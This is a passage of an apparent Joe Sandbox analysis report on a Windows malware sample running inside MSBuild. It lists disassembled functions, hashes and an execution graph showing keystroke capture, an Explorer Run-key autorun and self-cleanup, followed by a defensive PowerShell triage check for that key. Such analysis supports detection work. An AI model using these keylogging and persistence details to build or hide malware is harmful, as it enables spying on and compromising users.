• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: DefaultUser
• String ID: GetUserDefaultLocaleName$u;~/
• API String ID: 3358694519-1470064895
• Opcode ID: f51004d8d7f432e3b335bc09588288aaebc967ffd78315a85ed6d28db819058c
• Instruction ID: c4de6933aa7e9282c2d26db3fc0b7b8b7f29f17085e7c1fb0c181cc3595b3be3
• Opcode Fuzzy Hash: f51004d8d7f432e3b335bc09588288aaebc967ffd78315a85ed6d28db819058c
• Instruction Fuzzy Hash: 0CF02430A04208B7DB11AF61DC02E9E7F64EF04711F404066FC045A272CB799E119BCD
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: T=G$T=G
• API String ID: 3519838083-3732185208
• Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
• Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
• Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
• Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _abort
• String ID: u;~$u;~/
• API String ID: 1888311480-2138281631
• Opcode ID: 0ab663aabe5c41df582e4c47645a97e73dd3a553072dbf54e942a0c5fdfaaca6
• Instruction ID: b90d4d5e449150af2a70b4dce098d8e40181ff3ffdfca661e457813227e6f640
• Opcode Fuzzy Hash: 0ab663aabe5c41df582e4c47645a97e73dd3a553072dbf54e942a0c5fdfaaca6
• Instruction Fuzzy Hash: F1F0B432D11305DBDB14FF76ED06B1D37A19B00B25F21456AE4089B2E3DB74A881865E
                                                                                                                                            APIs
                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044AC56,-00000020,00000FA0,00000000,00466608,00466608,00000000), ref: 00447779
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                            • String ID: InitializeCriticalSectionEx$u;~/
                                                                                                                                            • API String ID: 2593887523-4197256090
                                                                                                                                            • Opcode ID: 9f5a7984421e604b5ed8c94f461c8afd071bb0bca78cc8af36d0c10864a520f0
                                                                                                                                            • Instruction ID: f6b50553e1d3dd0462d8356f048064d45bc8ee5fbdc9d8762f4c05423acd684c
                                                                                                                                            • Opcode Fuzzy Hash: 9f5a7984421e604b5ed8c94f461c8afd071bb0bca78cc8af36d0c10864a520f0
                                                                                                                                            • Instruction Fuzzy Hash: A0F0B431A4420DFBCB155F65EC05E9E7F61DF04722B0040BAFC0856261CB39AE11D69D
                                                                                                                                            APIs
                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                            • String ID: [AltL]$[AltR]
                                                                                                                                            • API String ID: 2738857842-2658077756
                                                                                                                                            • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                                            • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                            • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                                            • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Alloc
                                                                                                                                            • String ID: FlsAlloc$u;~/
                                                                                                                                            • API String ID: 2773662609-3350286328
                                                                                                                                            • Opcode ID: 2db8a698361bcf016b5b57fe13c06012e15bde99a7e9bc707b8f10b5e3e45f27
                                                                                                                                            • Instruction ID: 24f66c7253cb77c9f437760898e342ee7dcb6335a46030aa2dd544025cc123c2
                                                                                                                                            • Opcode Fuzzy Hash: 2db8a698361bcf016b5b57fe13c06012e15bde99a7e9bc707b8f10b5e3e45f27
                                                                                                                                            • Instruction Fuzzy Hash: B8E05530A8420AA7D214AF20AC03A2EFB54CF04762F0005AAFC0493342CE388E01D1DE
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Free
                                                                                                                                            • String ID: FlsFree$u;~/
                                                                                                                                            • API String ID: 3978063606-1396784693
                                                                                                                                            • Opcode ID: 62d43d67a10ceb863202033ef92c99af1daee8678d202b8b688647115ccc3df7
                                                                                                                                            • Instruction ID: 7735eda0010a26759507aa5f10490f8ec8c905a22dac2ca951c33145abc56605
                                                                                                                                            • Opcode Fuzzy Hash: 62d43d67a10ceb863202033ef92c99af1daee8678d202b8b688647115ccc3df7
                                                                                                                                            • Instruction Fuzzy Hash: D1E0E531A45218A7D720AF25AC02E3EBF94DF44B12F1001AAFD0597252CE355E0196DE
                                                                                                                                            APIs
                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,004395D7), ref: 00447640
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time$FileSystem
                                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime$u;~/
                                                                                                                                            • API String ID: 2086374402-2341449687
                                                                                                                                            • Opcode ID: 19155e5de694f0b636fed2830c1552735b72ebcda65ae3136b4addfb9e5e708b
                                                                                                                                            • Instruction ID: 93e267b14f3539efa22cf49968ab422456f43bf7ede497bc1fb1296ec8be01e3
                                                                                                                                            • Opcode Fuzzy Hash: 19155e5de694f0b636fed2830c1552735b72ebcda65ae3136b4addfb9e5e708b
                                                                                                                                            • Instruction Fuzzy Hash: 2EE0E531A46218A79320AF25AC03E3FBB54DF04B22F1102BAFC0597253CE254D019ADE
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00448825
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                                                                            • String ID: `@$`@
                                                                                                                                            • API String ID: 1353095263-20545824
                                                                                                                                            • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                            • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                                                            • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                            • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                                                            APIs
                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: State
                                                                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                                                                            • API String ID: 1649606143-2446555240
                                                                                                                                            • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                            • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                                            Strings
                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteOpenValue
                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                            • API String ID: 2654517830-1051519024
                                                                                                                                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
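The record above ties the string Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ to a registry open/delete-value API pair (API ID DeleteOpenValue) inside the dumped 0x00400000 image. Values under that key are launched by Explorer at logon and are rarely populated on a clean workstation, so it is one of the first places to look when triaging a host that ran this sample. The PowerShell below is an added triage check written for this page; it is not part of the Joe Sandbox report or of the sample. It assumes a Windows host with Windows PowerShell 5.1 or PowerShell 7, enumerates the key in both HKCU and HKLM, and reports for each value whether the referenced executable still exists on disk.

```powershell
# Added triage check (not from the Joe Sandbox report or the sample).
# Assumption: runs on a Windows host, Windows PowerShell 5.1 or PowerShell 7.
$subKey = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'

function Get-PolicyRunEntries {
    foreach ($hive in 'HKCU:', 'HKLM:') {
        $path = Join-Path -Path $hive -ChildPath $subKey
        if (-not (Test-Path -LiteralPath $path)) {
            # Key absent is the normal state on a clean workstation.
            continue
        }
        $item = Get-ItemProperty -LiteralPath $path
        foreach ($prop in $item.PSObject.Properties) {
            # Skip the provider metadata properties PowerShell adds to the object.
            if ($prop.Name -match '^PS(Path|ParentPath|ChildName|Drive|Provider)$') { continue }
            $command = [string]$prop.Value

            # Recover the image path: a quoted path, else the first token ending in .exe,
            # else the first whitespace-delimited token.
            if ($command -match '^\s*"([^"]+)"') {
                $image = $Matches[1]
            } elseif ($command -match '^\s*(\S+?\.exe)') {
                $image = $Matches[1]
            } else {
                $image = ($command -split '\s+')[0]
            }
            $image = [Environment]::ExpandEnvironmentVariables($image)
            $exists = $false
            if (-not [string]::IsNullOrWhiteSpace($image)) {
                $exists = Test-Path -LiteralPath $image
            }

            [pscustomobject]@{
                Hive        = $hive
                ValueName   = $prop.Name
                Command     = $command
                Image       = $image
                ImageExists = $exists
            }
        }
    }
}

$entries = @(Get-PolicyRunEntries)
if ($entries.Count -eq 0) {
    'No values under Policies\Explorer\Run in HKCU or HKLM.'
} else {
    $entries | Format-Table -AutoSize
}
```

A value whose Image no longer exists is still worth keeping as evidence: the sample's cleanup path in the following record (DeleteFileW / RemoveDirectoryW) can leave a dangling autorun entry behind. For continuous detection, pair this one-off check with Sysmon Event ID 13 (RegistryEvent, value set) filtered on a TargetObject containing Policies\Explorer\Run.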
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteDirectoryFileRemove
                                                                                                                                            • String ID: pth_unenc
                                                                                                                                            • API String ID: 3325800564-4028850238
                                                                                                                                            • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                                            • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                                            • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                                            • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                                            APIs
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                            • String ID: pth_unenc
                                                                                                                                            • API String ID: 1872346434-4028850238
                                                                                                                                            • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                            • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                                            • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                            • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CommandLine
                                                                                                                                            • String ID: x7
                                                                                                                                            • API String ID: 3253501508-374306512
                                                                                                                                            • Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                                                                                            • Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
                                                                                                                                            • Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                                                                                            • Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CommandLine
                                                                                                                                            • String ID: x7
                                                                                                                                            • API String ID: 3253501508-374306512
                                                                                                                                            • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                                                                            • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                                                                                                                            • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                                                                            • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                                                            • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                            • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                                            • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                                                            • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                                            • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                                                                                                            Execution Graph

                                                                                                                                             Execution Coverage: 6.3%
                                                                                                                                             Dynamic/Decrypted Code Coverage: 9.2%
                                                                                                                                             Signature Coverage: 0.8%
                                                                                                                                             Total number of Nodes: 2000
                                                                                                                                             Total number of Limit Nodes: 63
                                                                                                                                             execution_graph (interactive node/edge rendering omitted; the call chains below are recovered from the node list, addresses relative to the 00400000 image base; the listing is truncated in the source)
                                                                                                                                             • CRT entry: 4466f4 -> 446904 -> 446700 GetModuleHandleA -> 446710 __set_app_type __p__fmode __p__commode -> 4467ac __setusermatherr -> 4468f0 _controlfp -> 4467bd _initterm __wgetmainargs _initterm -> 44681e GetStartupInfoW -> 446866 GetModuleHandleA -> 41276d; return path 412789 -> 446896 exit -> 44689d _cexit
                                                                                                                                             • 41276d -> 4044a4 LoadLibraryW -> 4044cf GetProcAddress -> 4044e8 FreeLibrary; 4044f7 -> 404507 MessageBoxW
                                                                                                                                             • 41276d -> 414b81 -> 40a804 memset -> 40a83b GetSystemDirectoryW / 40a84c wcscpy -> 409719 wcslen -> 40972c / 409739 wcscat LoadLibraryW -> 40a881 LoadLibraryW -> 414b9e GetProcAddress -> 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW
                                                                                                                                             • 4127c8 -> 412465 memset ??2@YAPAXI -> 412505 ??2@YAPAXI -> 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI / 444722 -> 444728 DeleteObject -> 409cc3 -> 409bfd memset wcscpy -> 409cdb CreateFontIndirectW -> 4010f9 -> 401107 wcsncat / 401134 GetModuleHandleW LoadIconW -> 40a7be -> 41259b wcscpy
                                                                                                                                             • 4127ea -> 40ac21 -> 40b1ab free free; 40a9ce malloc memcpy free free; 40ace7 free; 40a8d0 wcslen free memcpy; 4099f4 malloc memcpy free; 40aa04 free; 40ada2 -> 40adb3 _wcsicmp
                                                                                                                                             • 412813 -> 40dd07 memset -> 40dce0 -> 409bca GetModuleFileNameW -> 40dce6 wcsrchr -> 40dcf9 wcscat -> 40dd3a GetModuleHandleW -> 40dba7 -> 44db70 -> 40dbb4 memset memset -> 409bca GetModuleFileNameW -> 4447d9 -> 444807 ??2@YAPAXI -> 444873 _snwprintf / 4448ab wcscpy -> 44474a (8 API calls, invoked eight times) -> 444960 ??3@YAXPAX -> 40dc34 wcscpy wcscpy -> 40d6f5 -> 40d702 memset GetPrivateProfileStringW -> 40d75c WritePrivateProfileStringW; 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy -> 40da80 -> 40da8d memset -> 40daac LoadStringW -> 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow
                                                                                                                                             • 412827 -> 40db69 memset -> 40dce0 -> 40dae1 -> 409b98 GetFileAttributesW -> 40daef wcscpy wcscpy GetPrivateProfileIntW -> 40d65d GetPrivateProfileStringW (three calls)
                                                                                                                                             • 41268e -> 402f3a -> 40eaff -> 40e8e0 ??3@YAXPAX (five calls) -> 40e931 ??2@YAPAXI ??2@YAPAXI -> 40eb6c memcpy memcpy -> 40ebf2 ??2@YAPAXI ??2@YAPAXI -> 40ec2e ??2@YAPAXI -> 40ea7f -> 40aa04 free (four calls) -> 40a9ce (four calls); 40d134 16 API calls; 4126d3 _wcsicmp; 4125f8 7 API calls
                                                                                                                                             • 41270a -> 411ac5 -> 411ae2 memset -> 409bca GetModuleFileNameW -> 411b0a wcsrchr -> 411b22 wcscat -> 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle -> 411b67 -> 402afb -> 40b2cc (27 API calls, about thirty successive calls 402b0a .. 402d93) -> 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement -> 40ea13 SendMessageW memset SendMessageW
                                                                                                                                             • 40b2cc -> 40b58d -> 40b5a4 GetModuleHandleW FindResourceW -> 40b5c2 LoadResource -> 40b5d0 SizeofResource LockResource -> 40afcf -> 40b04b ??3@YAXPAX -> 40afd7 ??2@YAPAXI -> 40b608 memcpy -> 40b4d3 memcpy -> 40b3c1 18 API calls -> 40b04b ??3@YAXPAX
                                                                                                                                             • 411a8b -> 402afb -> 4110dc -> 4110f7 _wcsicmp / 410c46 10 API calls -> 40969c LoadCursorW SetCursor -> 444a54 -> 444a64 FreeLibrary; 4032b4 -> 40b633 free -> 44553b; 40ada2 _wcsicmp -> 4111a6 qsort
